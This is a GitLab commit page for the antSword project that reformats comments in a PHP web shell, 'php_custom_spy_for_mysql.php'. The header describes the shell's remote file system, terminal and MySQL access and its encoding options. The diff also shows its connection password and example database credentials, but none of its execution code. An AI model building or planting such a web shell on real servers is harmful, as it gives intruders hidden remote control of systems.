Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
A
antSword
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
HuangJunbo
antSword
Commits
3f629a72
Commit
3f629a72
authored
Apr 06, 2016
by
Medicean
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
fix php custom spy style
parent
870c0ce7
Changes
1
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
27 additions
and
27 deletions
+27
-27
php_custom_spy_for_mysql.php
shells/php_custom_spy_for_mysql.php
+27
-27
No files found.
shells/php_custom_spy_for_mysql.php
View file @
3f629a72
<?php
/**
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword PHP Custom Spy for Mysql
Author:Medici.Yan
———————————————————————————————————————————————
使用说明:
1. AntSword >= v1.1-dev
2. 创建 Shell 时选择 custom 模式连接
3. 数据库连接:
<H>localhost</H>
<U>root</U>
<P>123456</P>
4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
ChangeLog:
Date: 2016/04/06 v1.0
1. 文件系统 和 terminal 管理
2. mysql 数据库支持
3. 支持 base64 和 hex 编码
*
_ ____ _
*
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
*
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
*
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
*
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
*
———————————————————————————————————————————————
*
AntSword PHP Custom Spy for Mysql
*
Author:Medici.Yan
*
———————————————————————————————————————————————
*
*
使用说明:
*
1. AntSword >= v1.1-dev
*
2. 创建 Shell 时选择 custom 模式连接
*
3. 数据库连接:
*
<H>localhost</H>
*
<U>root</U>
*
<P>123456</P>
*
*
4. 本脚本中 encoder 与 AntSword 添加 Shell 时选择的 encoder 要一致,如果选择 default 则需要将 encoder 值设置为空
*
*
ChangeLog:
*
*
Date: 2016/04/06 v1.0
*
1. 文件系统 和 terminal 管理
*
2. mysql 数据库支持
*
3. 支持 base64 和 hex 编码
**/
$pwd
=
"ant"
;
//连接密码
...
...
@@ -36,7 +36,7 @@ $encoder = ""; // default
$cs
=
"UTF-8"
;
/**
字符编码处理
*
字符编码处理
**/
function
EC
(
$s
){
global
$cs
;
...
...
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment